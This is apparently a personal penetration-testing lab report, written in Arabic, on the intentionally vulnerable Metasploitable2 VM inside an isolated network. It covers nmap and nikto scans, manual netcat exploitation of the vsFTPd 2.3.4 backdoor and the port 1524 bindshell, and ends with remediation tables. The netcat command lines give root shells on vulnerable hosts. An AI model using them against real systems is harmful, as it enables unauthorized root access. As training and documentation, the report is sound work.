
مختبر اختبار اختراق في شبكة معزولة: الاستكشاف باستخدام nmap/nikto والاستغلال اليدوي لـ Metasploitable2 (backdoor vsFTPd CVE-2011-2523، bindshell) مع تقرير تقني كامل.
المؤلف: Daniel Stefan de Jesus dos Reis
التاريخ: سبتمبر/2026
البيئة: مختبر شخصي KVM في شبكة افتراضية معزولة pentestlab
أُجري هذا الاختبار حصريًا ضد جهاز افتراضي خاص وقابل للاختراق بشكل متعمد، وزّعته Rapid7 تحديدًا لأغراض التدريب في الأمن الهجومي، داخل شبكة افتراضية معزولة بلا منفذ للإنترنت. لم يتم الوصول إلى أي نظام تابع لطرف ثالث. هذا المشروع ذو غرض تعليمي حصري، لتطوير المهارات في اختبارات الاختراق.
pentestlab (جسر virbr-lab)، الشبكة الفرعية 192.168.100.0/24، بدون <forward> مُهيّأ — أي شبكة معزولة فعليًا: تتواصل الأجهزة الافتراضية فيما بينها ومع المضيف، لكن ليس لديها مسار للخروج من المختبر. ملف XML الخاص بالشبكة في evidencias/pentestlab_network.xml.virbr-lab، باستخدام nmap وnikto وgobuster وhydra وsqlmap وnetcat.metasploitable2 (Metasploitable2، Ubuntu 8.04 معدّل)، عنوان IP 192.168.100.90/24، مُخصّص عبر DHCP من الشبكة المعزولة نفسها.[ Host / Atacante ]
|
virbr-lab (rede isolada, sem saída para internet)
|
[ metasploitable2 ]
اتّبعت تدفقًا أساسيًا: الاستطلاع → التعداد → الاستغلال → التوثيق:
nmap -sV -sC -p-)nikto)nc، لفهم آلية كل خلل، وليس مجرد "تشغيل الاستغلال"الأمر: nmap -sV -sC -p- -T4 192.168.100.90
المخرجات الكاملة: evidencias/nmap_full_scan.txt
ملخص الخدمات الأكثر أهمية التي تم العثور عليها:
بين 30/06/2011 و03/07/2011، تم التلاعب بالكود المصدري لـ vsFTPd 2.3.4 المتاح للتنزيل من قِبل مهاجم. الإصدار المخترق يحتوي على باب خلفي: عند استقبال سلسلة نصية تنتهي بـ :) في حقل المستخدم لتسجيل الدخول عبر FTP، يفتح الخادم صدفة root على منفذ TCP 6200، دون أي مصادقة.
الخطوات المُنفَّذة (السجل الكامل في evidencias/vsftpd_backdoor_exploit.txt):
# 1. Disparar a backdoor enviando USER terminado em ":)"
( printf 'USER test:)\r\n'; sleep 1; printf 'PASS test\r\n'; sleep 2 ) | nc -w 5 192.168.100.90 21
# 2. Conectar na porta 6200, aberta pela backdoor
( printf 'whoami\n'; printf 'id\n'; printf 'uname -a\n'; sleep 2 ) | nc -w 5 192.168.100.90 6200
النتيجة:
uid=0(root) gid=0(root)
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
تم الحصول على وصول root كامل بدون مصادقة.
يُحدّد nmap هذه الخدمة بالفعل باسم Metasploitable root shell — وهو باب خلفي تُرك عمدًا في الصورة (من بقايا استغلال سابق، شائع في صور التدريب). لا يتطلب استغلالًا: يكفي الاتصال.
( printf 'whoami\n'; printf 'id\n'; sleep 2 ) | nc -w 4 192.168.100.90 1524
النتيجة: uid=0(root) gid=0(root) groups=0(root) — root فوري.
السجل الكامل في evidencias/bindshell_1524.txt.
إصدار UnrealIRCd العامل على المنفذين 6667/6697 يطابق بناءً وُزّع تاريخيًا مع باب خلفي (الأمر AB; متبوعًا بأمر صدفة). حاولت تفعيل الباب الخلفي يدويًا عبر nc، لكن الخادم تعامل مع المُدخل كأمر IRC غير صالح (451 :You have not registered) بدلًا من تنفيذ الأمر — إما أن هذه الصورة تحديدًا لا تحتوي على الملف التنفيذي المُحصَّن، أو أن الحمولة تحتاج ضبطًا دقيقًا لم أعطه أولوية في هذه الجولة. أسجّل هذا كمحاولة غير ناجحة، وليس كثغرة مؤكَّدة.
خدمة تجميع موزّع تقبل أوامر عشوائية من أي عميل يتصل، بدون مصادقة. مُحدَّدة بالإصدار، لم تُستغَل في هذه الجولة.
تاريخيًا عرضة لتنفيذ كود عن بُعد عبر إلغاء التسلسل. مُحدَّدة بالإصدار، لم تُستغَل في هذه الجولة.
الأمر: nikto -h 192.168.100.90 -p 80
المخرجات الكاملة: evidencias/nikto_scan.txt
أبرز النتائج:
TRACE مُفعَّلة (احتمال XST)/phpinfo.php مكشوف علنًا (يكشف إعدادات PHP)/phpMyAdmin/ متاح بدون تقييد IP/doc/ و/test/ و/icons/httponlypentestlab، بدلًا من الهجوم مباشرة من المضيف| المنفذ | الخدمة | الإصدار | ملاحظة |
|---|
| 21/tcp | FTP | vsftpd 2.3.4 | تسجيل دخول مجهول مسموح + باب خلفي معروف |
| 22/tcp | SSH | OpenSSH 4.7p1 | قديم |
| 23/tcp | Telnet | Linux telnetd | بروتوكول نصي مكشوف |
| 25/tcp | SMTP | Postfix | — |
| 80/tcp | HTTP | Apache 2.2.8 + PHP 5.2.4 | phpMyAdmin وphpinfo.php مكشوفان |
| 139/445/tcp | SMB | Samba 3.0.20-Debian | توقيع الرسائل معطّل |
| 1099/tcp | Java RMI | GNU Classpath grmiregistry | تاريخيًا عرضة لـ RCE |
| 1524/tcp | bindshell | — | صدفة root مفتوحة بالفعل، بدون مصادقة |
| 3306/tcp | MySQL | 5.0.51a-3ubuntu5 | — |
| 3632/tcp | distccd | v1 | تاريخيًا عرضة لـ RCE (CVE-2004-2687) |
| 5432/tcp | PostgreSQL | 8.3.0–8.3.7 | — |
| 5900/tcp | VNC | protocolo 3.3 | — |
| 6667/6697/tcp | IRC | UnrealIRCd 3.2.8.1 | إصدار مرتبط بـ باب خلفي معروف |
| 8180/tcp | HTTP | Apache Tomcat 5.5 | — |
| النتيجة | التوصية |
|---|
| الباب الخلفي vsFTPd 2.3.4 | عدم استخدام ملفات تنفيذية من مصادر غير رسمية/غير موثوقة أبدًا؛ التحقق من hash/توقيع الحزم قبل التثبيت |
| Bindshell على المنفذ 1524 | تدقيق المنافذ المفتوحة بانتظام (nmap داخلي دوري)؛ أي صدفة غير موثّقة تُعدّ حادثًا |
| distccd مكشوف بدون مصادقة | تقييده على مضيفين موثوقين عبر جدار الحماية أو تعطيله إن لم يكن قيد استخدام فعلي للتجميع الموزّع |
| phpMyAdmin/phpinfo.php مكشوفان | تقييد الوصول عبر IP/VPN، وعدم كشف الأدوات الإدارية علنًا أبدًا |
| Apache/PHP قديمان | الحفاظ على عملية إدارة تصحيحات فعّالة |
| سرد المجلدات مُفعَّل | تعطيل Options Indexes في Apache |
| SMB مع توقيع رسائل معطّل | تفعيل server signing = mandatory |